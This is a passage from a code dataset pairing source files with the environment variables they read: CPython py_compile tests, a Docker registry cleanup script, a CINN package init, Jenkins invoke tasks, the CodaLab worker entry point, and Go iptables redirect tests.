flags = importlib._bootstrap_external._classify_pyc(
fp.read(), 'test', {})
self.assertEqual(flags, 0b1)
def test_quiet(self):
bad_coding = os.path.join(os.path.dirname(__file__), 'bad_coding2.py')
with support.captured_stderr() as stderr:
self.assertIsNone(py_compile.compile(bad_coding, doraise=False, quiet=2))
self.assertIsNone(py_compile.compile(bad_coding, doraise=True, quiet=2))
self.assertEqual(stderr.getvalue(), '')
with self.assertRaises(py_compile.PyCompileError):
py_compile.compile(bad_coding, doraise=True, quiet=1)
class PyCompileTestsWithSourceEpoch(PyCompileTestsBase,
unittest.TestCase,
metaclass=SourceDateEpochTestMeta,
source_date_epoch=True):
pass
class PyCompileTestsWithoutSourceEpoch(PyCompileTestsBase,
unittest.TestCase,
metaclass=SourceDateEpochTestMeta,
source_date_epoch=False):
pass
class PyCompileCLITestCase(unittest.TestCase):
def setUp(self):
self.directory = tempfile.mkdtemp()
self.source_path = os.path.join(self.directory, '_test.py')
self.cache_path = importlib.util.cache_from_source(self.source_path)
with open(self.source_path, 'w') as file:
file.write('x = 123\n')
def tearDown(self):
os_helper.rmtree(self.directory)
@support.requires_subprocess()
def pycompilecmd(self, *args, **kwargs):
# assert_python_* helpers don't return proc object. We'll just use
# subprocess.run() instead of spawn_python() and its friends to test
# stdin support of the CLI.
if args and args[0] == '-' and 'input' in kwargs:
return subprocess.run([sys.executable, '-m', 'py_compile', '-'],
input=kwargs['input'].encode(),
capture_output=True)
return script_helper.assert_python_ok('-m', 'py_compile', *args, **kwargs)
def pycompilecmd_failure(self, *args):
return script_helper.assert_python_failure('-m', 'py_compile', *args)
def test_stdin(self):
result = self.pycompilecmd('-', input=self.source_path)
self.assertEqual(result.returncode, 0)
self.assertEqual(result.stdout, b'')
self.assertEqual(result.stderr, b'')
self.assertTrue(os.path.exists(self.cache_path))
def test_with_files(self):
rc, stdout, stderr = self.pycompilecmd(self.source_path, self.source_path)
self.assertEqual(rc, 0)
self.assertEqual(stdout, b'')
self.assertEqual(stderr, b'')
self.assertTrue(os.path.exists(self.cache_path))
def test_bad_syntax(self):
bad_syntax = os.path.join(os.path.dirname(__file__), 'badsyntax_3131.py')
rc, stdout, stderr = self.pycompilecmd_failure(bad_syntax)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertIn(b'SyntaxError', stderr)
def test_bad_syntax_with_quiet(self):
bad_syntax = os.path.join(os.path.dirname(__file__), 'badsyntax_3131.py')
rc, stdout, stderr = self.pycompilecmd_failure('-q', bad_syntax)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertEqual(stderr, b'')
def test_file_not_exists(self):
should_not_exists = os.path.join(os.path.dirname(__file__), 'should_not_exists.py')
rc, stdout, stderr = self.pycompilecmd_failure(self.source_path, should_not_exists)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertIn(b'no such file or directory', stderr.lower())
def test_file_not_exists_with_quiet(self):
should_not_exists = os.path.join(os.path.dirname(__file__), 'should_not_exists.py')
rc, stdout, stderr = self.pycompilecmd_failure('-q', self.source_path, should_not_exists)
self.assertEqual(rc, 1)
self.assertEqual(stdout, b'')
self.assertEqual(stderr, b'')
if __name__ == "__main__":
unittest.main()
| []
| []
| [
"SOURCE_DATE_EPOCH"
]
| [] | ["SOURCE_DATE_EPOCH"] | python | 1 | 0 | |
docker-registry-cleanup.py | import glob
import urllib3
from requests.auth import HTTPBasicAuth
import requests
import json
import re
import os
import boto
from boto.s3.key import Key
############################
######## Functions #########
############################
def exit_with_error(message):
print(message)
print("Exiting")
exit(1)
# Initial setup
try:
if "DRY_RUN" in os.environ and os.environ['DRY_RUN'] == "true":
dry_run_mode = True
print("Running in dry-run mode. No changes will be made.")
print()
else:
dry_run_mode = False
if "REGISTRY_STORAGE" in os.environ and os.environ['REGISTRY_STORAGE'] == "S3":
print("Running against S3 storage")
storage_on_s3 = True
s3_access_key = os.environ['ACCESS_KEY']
s3_secret_key = os.environ['SECRET_KEY']
s3_bucket = os.environ['BUCKET']
s3_region = os.environ['REGION']
if "REGISTRY_DIR" in os.environ:
registry_dir = os.environ['REGISTRY_DIR']
else:
registry_dir = "/"
else:
print("Running against local storage")
storage_on_s3 = False
if "REGISTRY_DIR" in os.environ:
registry_dir = os.environ['REGISTRY_DIR']
else:
registry_dir = "/registry"
registry_url = os.environ['REGISTRY_URL']
except KeyError as e:
exit_with_error("Missing environment variable: %s" % (e))
# Optional vars
if "REGISTRY_AUTH" in os.environ:
registry_auth = HTTPBasicAuth(os.environ["REGISTRY_AUTH"].split(":")[0], os.environ["REGISTRY_AUTH"].split(":")[1])
else:
registry_auth = {}
if "SELF_SIGNED_CERT" in os.environ:
cert_verify = False
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
else:
cert_verify = True
token_authentication = False
token_auth_details = {}
# Check connection to registry
try:
r = requests.get("%s/v2/" % (registry_url), auth=registry_auth, verify=cert_verify)
if r.status_code == 401:
if "Www-Authenticate" in r.headers and "Bearer" in r.headers["Www-Authenticate"]:
#We have token based auth, try it
auth_header = r.headers["Www-Authenticate"].split(" ")[1]
token_authentication = True
token_auth_details = dict(s.split("=", 1) for s in re.sub('"',"",auth_header).split(","))
r2 = requests.get("%s?service=%s&scope=" % (token_auth_details["realm"],token_auth_details["service"]), auth=registry_auth, verify=cert_verify)
if r2.status_code == 401:
exit_with_error("Got an authentication error connecting to the registry - even with token authentication. Check credentials, or add REGISTRY_AUTH='username:password'")
else:
auth_token = r2.json()["token"]
registry_headers = {"Authorization": "Bearer %s" % (auth_token)}
else:
exit_with_error("Got an authentication error connecting to the registry. Check credentials, or add REGISTRY_AUTH='username:password'")
except requests.exceptions.SSLError as e:
exit_with_error("Got an SSLError connecting to the registry. Might be a self signed cert, please set SELF_SIGNED_CERT=true")
except requests.exceptions.RequestException as e:
exit_with_error("Could not contact registry at %s - error: %s" % (registry_url, e))
# Set variables
repo_dir = registry_dir + "/docker/registry/v2/repositories"
blob_dir = registry_dir + "/docker/registry/v2/blobs"
all_manifests = set()
linked_manifests = set()
linked_manifest_files = set()
file_list = set()
if storage_on_s3:
bucket_size = 0
# Connect to bucket
conn = boto.s3.connect_to_region(s3_region, aws_access_key_id=s3_access_key, aws_secret_access_key=s3_secret_key)
bucket = conn.get_bucket(s3_bucket)
s3_file_list = bucket.list()
#get all the filenames in bucket as well as size
for key in s3_file_list:
bucket_size += key.size
file_list.add(key.name)
else:
#local storage
for filename in glob.iglob("%s/**" % (registry_dir), recursive=True):
if os.path.isfile(filename):
file_list.add(filename)
for filename in file_list:
if filename.endswith("link"):
if "_manifests/revisions/sha256" in filename:
all_manifests.add(re.sub('.*docker/registry/v2/repositories/.*/_manifests/revisions/sha256/(.*)/link','\\1',filename))
elif "_manifests/tags/" in filename and filename.endswith("/current/link"):
linked_manifest_files.add(filename)
#fetch linked_manifest_files
for filename in linked_manifest_files:
error = False
if storage_on_s3:
k = Key(bucket)
k.key = filename
#Get the shasum from the link file
shasum = k.get_contents_as_string().decode().split(":")[1]
#Get the manifest json to check if its a manifest list
k.key = "%s/sha256/%s/%s/data" % (blob_dir, shasum[0:2], shasum)
try:
manifest = json.loads(k.get_contents_as_string().decode())
except Exception as e:
error = True
print("Caught error trying to read manifest, ignoring.")
else:
shasum = open(filename, 'r').read().split(":")[1]
try:
manifest = json.loads(open("%s/sha256/%s/%s/data" % (blob_dir, shasum[0:2], shasum)).read())
except Exception as e:
error = True
print("Caught error trying to read manifest, ignoring: ", filename)
if error:
linked_manifests.add(shasum)
else:
try:
manifest_media_type = manifest["mediaType"]
except:
manifest_media_type = ""
if manifest_media_type == "application/vnd.docker.distribution.manifest.list.v2+json":
#add all manifests from manifest list
for mf in manifest["manifests"]:
linked_manifests.add(mf["digest"])
else:
linked_manifests.add(shasum)
unused_manifests = all_manifests - linked_manifests
if len(unused_manifests) == 0:
print("No manifests without tags found. Nothing to do.")
if storage_on_s3:
print("For reference, the size of the bucket is currently: %s bytes" % (bucket_size))
else:
print("Found " + str(len(unused_manifests)) + " manifests without tags. Deleting")
#counters
current_count = 0
cleaned_count = 0
failed_count = 0
total_count = len(unused_manifests)
for manifest in unused_manifests:
current_count += 1
status_msg = "Cleaning %s of %s" % (current_count, total_count)
if "DRY_RUN" in os.environ and os.environ['DRY_RUN'] == "true":
status_msg += " ..not really, due to dry-run mode"
print(status_msg)
#get repos
repos = set()
for file in file_list:
if "_manifests/revisions/sha256/%s" % (manifest) in file and file.endswith("link"):
repos.add(re.sub(".*docker/registry/v2/repositories/(.*)/_manifests/revisions/sha256.*", "\\1", file))
for repo in repos:
if dry_run_mode:
print("DRY_RUN: Would have run an HTTP DELETE request to %s/v2/%s/manifests/sha256:%s" % (registry_url, repo, manifest))
else:
if token_authentication:
r2 = requests.get("%s?service=%s&scope=repository:%s:*" % (token_auth_details["realm"],token_auth_details["service"],repo), auth=registry_auth, verify=cert_verify)
auth_token = r2.json()["token"]
registry_headers = {"Authorization": "Bearer %s" % (auth_token)}
r = requests.delete("%s/v2/%s/manifests/sha256:%s" % (registry_url, repo, manifest), verify=cert_verify, headers=registry_headers)
else:
r = requests.delete("%s/v2/%s/manifests/sha256:%s" % (registry_url, repo, manifest), auth=registry_auth, verify=cert_verify)
if r.status_code == 202:
cleaned_count += 1
else:
failed_count += 1
print("Failed to clean manifest %s from repo %s with response code %s" % (manifest, repo, r.status_code))
print("Job done, Cleaned %s of %s manifests." % (cleaned_count, total_count))
print()
print()
if storage_on_s3:
print("For reference, the size of the bucket before this run was: %s bytes" % (bucket_size))
print()
print("Please run a garbage-collect on the registry now to free up disk space.")
| []
| []
| [
"ACCESS_KEY",
"BUCKET",
"REGISTRY_DIR",
"REGISTRY_AUTH",
"REGISTRY_URL",
"SECRET_KEY",
"REGION",
"DRY_RUN",
"REGISTRY_STORAGE"
]
| [] | ["ACCESS_KEY", "BUCKET", "REGISTRY_DIR", "REGISTRY_AUTH", "REGISTRY_URL", "SECRET_KEY", "REGION", "DRY_RUN", "REGISTRY_STORAGE"] | python | 9 | 0 | |
python/cinn/__init__.py | # Copyright (c) 2021 CINN Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
cinndir = os.path.dirname(os.path.abspath(__file__))
runtime_include_dir = os.path.join(cinndir, "libs")
cuhfile = os.path.join(runtime_include_dir, "cinn_cuda_runtime_source.cuh")
if os.path.exists(cuhfile):
os.environ['runtime_include_dir'] = runtime_include_dir
from .core_api.common import *
from .core_api.backends import *
from .core_api.poly import *
from .core_api.ir import *
from .core_api.lang import *
from .version import full_version as __version__
| []
| []
| [
"runtime_include_dir"
]
| [] | ["runtime_include_dir"] | python | 1 | 0 | |
tasks.py | import os
from invoke import task
from tests.refapi import JenkinsCLI
from tests.install import JenkinsInstall
JENKINS_WAR_URL = 'http://mirrors.jenkins-ci.org/war/latest/jenkins.war'
JENKINS_CLI_JAR = 'tests/tmp/latest/jenkins-cli.jar'
JENKINS_HOST = 'localhost'
JENKINS_PORT = 60888
JENKINS_CPORT = 60887
JENKINS_DESTDIR = os.path.join(os.environ.get('TMPDIR', '/tmp'), 'jenkins-webapi-tests/jenkins-latest')
@task(name='start-jenkins')
def start_jenkins(ctx):
config = {
'url': JENKINS_WAR_URL,
'destdir': JENKINS_DESTDIR,
'host': JENKINS_HOST,
'port': JENKINS_PORT,
'cport': JENKINS_CPORT,
}
ji = JenkinsInstall(**config)
ji.bootstrap()
ji.start()
ji.wait()
@task(name='stop-jenkins')
def stop_jenkins(ctx):
ctx.run('echo 0 | nc %s %s' % (JENKINS_HOST, JENKINS_CPORT))
@task(name='remove-jobs')
def remove_jobs(ctx):
url = 'http://%s:%s' % (JENKINS_HOST, JENKINS_PORT)
cli = JenkinsCLI(url, JENKINS_CLI_JAR)
for job in cli.jobs():
cli.delete_job(job)
@task
def test(ctx):
ctx.run('py.test tests -xvs')
@task
def coverage(ctx):
ctx.run('py.test --cov-report term-missing --cov jenkins tests')
| []
| []
| [
"TMPDIR"
]
| [] | ["TMPDIR"] | python | 1 | 0 | |
codalab/worker/main.py | #!/usr/bin/env python3
# For information about the design of the worker, see design.pdf in the same
# directory as this file. For information about running a worker, see the
# tutorial on the CodaLab documentation.
import argparse
import getpass
import os
import logging
import signal
import socket
import stat
import sys
import psutil
import requests
from codalab.common import SingularityError
from codalab.lib.formatting import parse_size
from codalab.lib.telemetry_util import initialize_sentry, load_sentry_data, using_sentry
from .bundle_service_client import BundleServiceClient, BundleAuthException
from . import docker_utils
from .worker import Worker
from codalab.worker.dependency_manager import DependencyManager
from codalab.worker.docker_image_manager import DockerImageManager
from codalab.worker.singularity_image_manager import SingularityImageManager
logger = logging.getLogger(__name__)
DEFAULT_EXIT_AFTER_NUM_RUNS = 999999999
def parse_args():
parser = argparse.ArgumentParser(description='CodaLab worker.')
parser.add_argument(
'--tag',
help='Tag (can only contain letters, numbers or hyphens) that allows for scheduling runs on specific workers.',
)
parser.add_argument(
'--server',
default='https://worksheets.codalab.org',
help='URL of the CodaLab server, in the format '
'<http|https>://<hostname>[:<port>] (e.g., https://worksheets.codalab.org)',
)
parser.add_argument(
'--work-dir',
default='codalab-worker-scratch',
help='Directory where to store temporary bundle data, '
'including dependencies and the data from run '
'bundles.',
)
parser.add_argument(
'--network-prefix', default='codalab_worker_network', help='Docker network name prefix'
)
parser.add_argument(
'--cpuset',
type=parse_cpuset_args,
metavar='CPUSET_STR',
default='ALL',
help='Comma-separated list of CPUs in which to allow bundle execution, '
'(e.g., \"0,2,3\", \"1\").',
)
parser.add_argument(
'--gpuset',
type=parse_gpuset_args,
metavar='GPUSET_STR',
default='ALL',
help='Comma-separated list of GPUs in which to allow bundle execution. '
'Each GPU can be specified by its index or UUID'
'(e.g., \"0,1\", \"1\", \"GPU-62casdfasd-asfas...\"',
)
parser.add_argument(
'--max-work-dir-size',
type=parse_size,
metavar='SIZE',
default='10g',
help='Maximum size of the temporary bundle data ' '(e.g., 3, 3k, 3m, 3g, 3t).',
)
parser.add_argument(
'--max-image-cache-size',
type=parse_size,
metavar='SIZE',
default=None,
help='Limit the disk space used to cache Docker images '
'for worker jobs to the specified amount (e.g. '
'3, 3k, 3m, 3g, 3t). If the limit is exceeded, '
'the least recently used images are removed first. '
'Worker will not remove any images if this option '
'is not specified.',
)
parser.add_argument(
'--max-image-size',
type=parse_size,
metavar='SIZE',
default=None,
help='Limit the size of Docker images to download from the Docker Hub'
'(e.g. 3, 3k, 3m, 3g, 3t). If the limit is exceeded, '
'the requested image will not be downloaded. '
'The bundle depends on this image will fail accordingly. '
'If running an image on the singularity runtime, there is no size '
'check because singularity hub does not support the querying of image size',
)
parser.add_argument(
'--max-memory',
type=parse_size,
metavar='SIZE',
default=None,
help='Limit the amount of memory to a worker in bytes' '(e.g. 3, 3k, 3m, 3g, 3t).',
)
parser.add_argument(
'--password-file',
help='Path to the file containing the username and '
'password for logging into the bundle service, '
'each on a separate line. If not specified, the '
'password is read from standard input.',
)
parser.add_argument(
'--verbose', action='store_true', help='Whether to output verbose log messages.'
)
parser.add_argument(
'--exit-when-idle',
action='store_true',
help='If specified the worker quits if it finds itself with no jobs after a checkin',
)
parser.add_argument(
'--container-runtime',
choices=['docker', 'singularity'],
default='docker',
help='The worker will run jobs on the specified backend. The options are docker (default) or singularity',
)
parser.add_argument(
'--idle-seconds',
help='Not running anything for this many seconds constitutes idle',
type=int,
default=0,
)
parser.add_argument(
'--checkin-frequency-seconds',
help='Number of seconds to wait between worker check-ins',
type=int,
default=5,
)
parser.add_argument(
'--id',
default='%s(%d)' % (socket.gethostname(), os.getpid()),
help='Internal use: ID to use for the worker.',
)
parser.add_argument(
'--shared-file-system',
action='store_true',
help='To be used when the server and the worker share the bundle store on their filesystems.',
)
parser.add_argument(
'--group', default=None, help='Name of the group that can run jobs on this worker'
)
parser.add_argument(
'--tag-exclusive',
action='store_true',
help='To be used when the worker should only run bundles that match the worker\'s tag.',
)
parser.add_argument(
'--pass-down-termination',
action='store_true',
help='Terminate the worker and kill all the existing running bundles.',
)
parser.add_argument(
'--delete-work-dir-on-exit',
action='store_true',
help="Delete the worker's working directory when the worker process exits.",
)
parser.add_argument(
'--exit-after-num-runs',
type=int,
default=DEFAULT_EXIT_AFTER_NUM_RUNS,
help='The worker quits after this many jobs assigned to this worker',
)
parser.add_argument(
'--exit-on-exception',
action='store_true',
help="Exit the worker if it encounters an exception (rather than sleeping).",
)
parser.add_argument(
'--download-dependencies-max-retries',
type=int,
default=3,
help='The number of times to retry downloading dependencies after a failure (defaults to 3).',
)
parser.add_argument(
'--shared-memory-size-gb',
type=int,
default=1,
help='The shared memory size of the run container in GB (defaults to 1).',
)
return parser.parse_args()
def connect_to_codalab_server(server, password_file):
# Get the username and password.
logger.info('Connecting to %s' % server)
if password_file:
if os.stat(password_file).st_mode & (stat.S_IRWXG | stat.S_IRWXO):
print(
"Permissions on password file are too lax.\n\
Only the user should be allowed to access the file.\n\
On Linux, run:\n\
chmod 600 %s"
% password_file,
file=sys.stderr,
)
sys.exit(1)
with open(password_file) as f:
username = f.readline().strip()
password = f.readline().strip()
else:
username = os.environ.get('CODALAB_USERNAME')
if username is None:
username = input('Username: ')
password = os.environ.get('CODALAB_PASSWORD')
if password is None:
password = getpass.getpass()
try:
bundle_service = BundleServiceClient(server, username, password)
return bundle_service
except BundleAuthException as ex:
logger.error(
'Cannot log into the bundle service. Please check your worker credentials.\n'
f'Username: "{username}" , server "{server}"\n'
)
logger.debug('Auth error: {}'.format(ex))
sys.exit(1)
def main():
args = parse_args()
if args.tag and not args.tag.replace("-", "").isalnum():
raise argparse.ArgumentTypeError(
"Worker tag must only contain letters, numbers or hyphens."
)
# Configure logging
log_format: str = '%(asctime)s %(message)s'
if args.verbose:
log_format += ' %(pathname)s %(lineno)d'
log_level = logging.DEBUG
else:
log_level = logging.INFO
logging.basicConfig(format=log_format, level=log_level)
logging.getLogger('urllib3').setLevel(logging.INFO)
# Initialize sentry logging
if using_sentry():
initialize_sentry()
# This quits if connection unsuccessful
bundle_service = connect_to_codalab_server(args.server, args.password_file)
# Load some data into sentry
if using_sentry():
load_sentry_data(username=bundle_service._username, **vars(args))
if args.shared_file_system:
# No need to store bundles locally if filesystems are shared
local_bundles_dir = None
# Also no need to download dependencies if they're on the filesystem already
dependency_manager = None
else:
local_bundles_dir = os.path.join(args.work_dir, 'runs')
dependency_manager = DependencyManager(
os.path.join(args.work_dir, 'dependencies-state.json'),
bundle_service,
args.work_dir,
args.max_work_dir_size,
args.download_dependencies_max_retries,
)
if args.container_runtime == "singularity":
singularity_folder = os.path.join(args.work_dir, 'codalab_singularity_images')
if not os.path.exists(singularity_folder):
logger.info(
'Local singularity image location %s doesn\'t exist, creating.', singularity_folder,
)
os.makedirs(singularity_folder, 0o770)
image_manager = SingularityImageManager(
args.max_image_size, args.max_image_cache_size, singularity_folder,
)
# todo workers with singularity don't work because this is set to none -- handle this
docker_runtime = None
else:
image_manager = DockerImageManager(
os.path.join(args.work_dir, 'images-state.json'),
args.max_image_cache_size,
args.max_image_size,
)
docker_runtime = docker_utils.get_available_runtime()
# Set up local directories
if not os.path.exists(args.work_dir):
logging.debug('Work dir %s doesn\'t exist, creating.', args.work_dir)
os.makedirs(args.work_dir, 0o770)
if local_bundles_dir and not os.path.exists(local_bundles_dir):
logger.info('%s doesn\'t exist, creating.', local_bundles_dir)
os.makedirs(local_bundles_dir, 0o770)
worker = Worker(
image_manager,
dependency_manager,
os.path.join(args.work_dir, 'worker-state.json'),
args.cpuset,
args.gpuset,
args.max_memory,
args.id,
args.tag,
args.work_dir,
local_bundles_dir,
args.exit_when_idle,
args.exit_after_num_runs,
args.idle_seconds,
args.checkin_frequency_seconds,
bundle_service,
args.shared_file_system,
args.tag_exclusive,
args.group,
docker_runtime=docker_runtime,
docker_network_prefix=args.network_prefix,
pass_down_termination=args.pass_down_termination,
delete_work_dir_on_exit=args.delete_work_dir_on_exit,
exit_on_exception=args.exit_on_exception,
shared_memory_size_gb=args.shared_memory_size_gb,
)
# Register a signal handler to ensure safe shutdown.
for sig in [signal.SIGTERM, signal.SIGINT, signal.SIGHUP]:
signal.signal(sig, lambda signup, frame: worker.signal())
# BEGIN: DO NOT CHANGE THIS LINE UNLESS YOU KNOW WHAT YOU ARE DOING
# THIS IS HERE TO KEEP TEST-CLI FROM HANGING
logger.info('Worker started!')
# END
worker.start()
def parse_cpuset_args(arg):
"""
Parse given arg into a set of integers representing cpus
Arguments:
arg: comma separated string of ints, or "ALL" representing all available cpus
"""
try:
# Get the set of cores that the process can actually use.
# For instance, on Slurm, the returning value may contain only 4 cores: {2,3,20,21}.
return os.sched_getaffinity(0)
except AttributeError:
# os.sched_getaffinity() isn't available on all platforms,
# so fallback to using the number of physical cores.
cpu_count = psutil.cpu_count(logical=False)
if arg == 'ALL':
cpuset = list(range(cpu_count))
else:
try:
cpuset = [int(s) for s in arg.split(',')]
except ValueError:
raise argparse.ArgumentTypeError(
"CPUSET_STR invalid format: must be a string of comma-separated integers"
)
if not len(cpuset) == len(set(cpuset)):
raise argparse.ArgumentTypeError("CPUSET_STR invalid: CPUs not distinct values")
if not all(cpu in range(cpu_count) for cpu in cpuset):
raise argparse.ArgumentTypeError("CPUSET_STR invalid: CPUs out of range")
return set(cpuset)
def parse_gpuset_args(arg):
"""
Parse given arg into a set of strings representing gpu UUIDs
By default, we will try to start a Docker container with nvidia-smi to get the GPUs.
If we get an exception that the Docker socket does not exist, which will be the case
on Singularity workers, because they do not have root access, and therefore, access to
the Docker socket, we should try to get the GPUs with Singularity.
Arguments:
arg: comma separated string of ints, or "ALL" representing all gpus
"""
logger.info(f"GPUSET arg: {arg}")
if arg == '' or arg == 'NONE':
return set()
try:
all_gpus = docker_utils.get_nvidia_devices() # Dict[GPU index: GPU UUID]
except docker_utils.DockerException:
all_gpus = {}
# Docker socket can't be used
except requests.exceptions.ConnectionError:
try:
all_gpus = docker_utils.get_nvidia_devices(use_docker=False)
except SingularityError:
all_gpus = {}
if arg == 'ALL':
return set(all_gpus.values())
else:
gpuset = arg.split(',')
if not all(gpu in all_gpus or gpu in all_gpus.values() for gpu in gpuset):
raise argparse.ArgumentTypeError("GPUSET_STR invalid: GPUs out of range")
return set(all_gpus.get(gpu, gpu) for gpu in gpuset)
if __name__ == '__main__':
main()
| []
| []
| [
"CODALAB_USERNAME",
"CODALAB_PASSWORD"
]
| [] | ["CODALAB_USERNAME", "CODALAB_PASSWORD"] | python | 2 | 0 | |
proxy-init/integration_test/iptables/http_test.go | package iptablestest
import (
"testing"
"net/http"
"io/ioutil"
"fmt"
"os"
"strings"
"net/url"
)
const (
ignoredContainerPort = "7070"
proxyContainerPort = "8080"
notTheProxyContainerPort = "9090"
)
func TestPodWithNoRules(t *testing.T) {
podWithNoRulesIp := os.Getenv("POD_WITH_NO_RULES_IP")
svcName := "svc-pod-with-no-rules"
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podWithNoRulesIp, proxyContainerPort)
})
t.Run("fails to connect to pod directly through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, podWithNoRulesIp, "8088")
expectCannotConnectGetRequestTo(t, podWithNoRulesIp, "8888")
expectCannotConnectGetRequestTo(t, podWithNoRulesIp, "8988")
})
t.Run("succeeds connecting to pod via a service through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, svcName, proxyContainerPort)
})
t.Run("fails to connect to pod via a service through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, svcName, "8088")
expectCannotConnectGetRequestTo(t, svcName, "8888")
expectCannotConnectGetRequestTo(t, svcName, "8988")
})
}
func TestPodRedirectsAllPorts(t *testing.T) {
podRedirectsAllPortsIp := os.Getenv("POD_REDIRECTS_ALL_PORTS_IP")
svcName := "svc-pod-redirects-all-ports"
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, proxyContainerPort)
})
t.Run("succeeds connecting to pod directly through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, "8088")
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, "8888")
expectSuccessfulGetRequestTo(t, podRedirectsAllPortsIp, "8988")
})
t.Run("succeeds connecting to pod via a service through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, svcName, proxyContainerPort)
})
t.Run("fails to connect to pod via a service through any port that isn't the container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, svcName, "8088")
expectCannotConnectGetRequestTo(t, svcName, "8888")
expectCannotConnectGetRequestTo(t, svcName, "8988")
})
}
func TestPodWithSomePortsRedirected(t *testing.T) {
podRedirectsSomePortsIp := os.Getenv("POD_REDIRECTS_WHITELISTED_IP")
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsSomePortsIp, proxyContainerPort)
})
t.Run("succeeds connecting to pod directly through ports configured to redirect", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podRedirectsSomePortsIp, "9090")
expectSuccessfulGetRequestTo(t, podRedirectsSomePortsIp, "9099")
})
t.Run("fails to connect to pod via through any port that isn't configured to redirect", func(t *testing.T) {
marksParallelIfConfigured(t)
expectCannotConnectGetRequestTo(t, podRedirectsSomePortsIp, "8088")
expectCannotConnectGetRequestTo(t, podRedirectsSomePortsIp, "8888")
expectCannotConnectGetRequestTo(t, podRedirectsSomePortsIp, "8988")
})
}
func TestPodWithSomePortsIgnored(t *testing.T) {
podIgnoredSomePortsIp := os.Getenv("POD_DOEST_REDIRECT_BLACKLISTED_IP")
t.Run("succeeds connecting to pod directly through container's exposed port", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, proxyContainerPort)
})
t.Run("succeeds connecting to pod directly through ports configured to redirect", func(t *testing.T) {
marksParallelIfConfigured(t)
expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, "9090")
expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, "9099")
})
t.Run("doesnt redirect when through port that is ignored", func(t *testing.T) {
marksParallelIfConfigured(t)
response := expectSuccessfulGetRequestTo(t, podIgnoredSomePortsIp, ignoredContainerPort)
if !strings.Contains(response, ignoredContainerPort) {
t.Fatalf("Expected iptables to ignore connection to %s, got back %s", ignoredContainerPort, response)
}
})
}
func TestPodMakesOutboundConnection(t *testing.T) {
podIgnoredSomePortsIp := os.Getenv("POD_DOEST_REDIRECT_BLACKLISTED_IP")
podWithNoRulesIp := os.Getenv("POD_WITH_NO_RULES_IP")
podWithNoRulesName := "pod-with-no-rules"
proxyPodName := "pod-doesnt-redirect-blacklisted"
proxyPodIp := podIgnoredSomePortsIp
t.Run("connecting to another pod from non-proxy container gets redirected to proxy", func(t *testing.T) {
marksParallelIfConfigured(t)
portOfContainerToMAkeTheRequest := ignoredContainerPort
targetPodIp := podWithNoRulesIp
targetPort := ignoredContainerPort
response := makeCallFromContainerToAnother(t, proxyPodIp, portOfContainerToMAkeTheRequest, targetPodIp, targetPort)
expectedDownstreamResponse := fmt.Sprintf("me:[%s:%s]downstream:[proxy]", proxyPodName, portOfContainerToMAkeTheRequest)
if !strings.Contains(response, expectedDownstreamResponse) {
t.Fatalf("Expected response to be redirected to the proxy, expected %s but it was %s", expectedDownstreamResponse, response)
}
})
t.Run("connecting to another pod from proxy container does not get redirected to proxy", func(t *testing.T) {
marksParallelIfConfigured(t)
targetPodIp := podWithNoRulesIp
targetPodName := podWithNoRulesName
response := makeCallFromContainerToAnother(t, proxyPodIp, proxyContainerPort, targetPodIp, notTheProxyContainerPort)
expectedDownstreamResponse := fmt.Sprintf("me:[proxy]downstream:[%s:%s]", targetPodName, notTheProxyContainerPort)
if !strings.Contains(response, expectedDownstreamResponse) {
t.Fatalf("Expected response not to be redirected to the proxy, expected %s but it was %s", expectedDownstreamResponse, response)
}
})
t.Run("connecting to loopback from non-proxy container does not get redirected to proxy", func(t *testing.T) {
marksParallelIfConfigured(t)
response := makeCallFromContainerToAnother(t, proxyPodIp, ignoredContainerPort, "127.0.0.1", notTheProxyContainerPort)
expectedDownstreamResponse := fmt.Sprintf("me:[%s:%s]downstream:[%s:%s]", proxyPodName, ignoredContainerPort, proxyPodName, notTheProxyContainerPort)
if !strings.Contains(response, expectedDownstreamResponse) {
t.Fatalf("Expected response not to be redirected to the proxy, expected %s but it was %s", expectedDownstreamResponse, response)
}
})
}
func makeCallFromContainerToAnother(t *testing.T, fromPodNamed string, fromContainerAtPort string, podIWantToReachName string, containerPortIWantToReach string) string {
downstreamUrl := fmt.Sprintf("http://%s:%s", podIWantToReachName, containerPortIWantToReach)
//Make request asking target to make a back-end request
targetUrl := fmt.Sprintf("http://%s:%s/call?url=%s", fromPodNamed, fromContainerAtPort, url.QueryEscape(downstreamUrl))
return expectSuccessfulGetRequestToUrl(t, targetUrl)
}
func marksParallelIfConfigured(t *testing.T) {
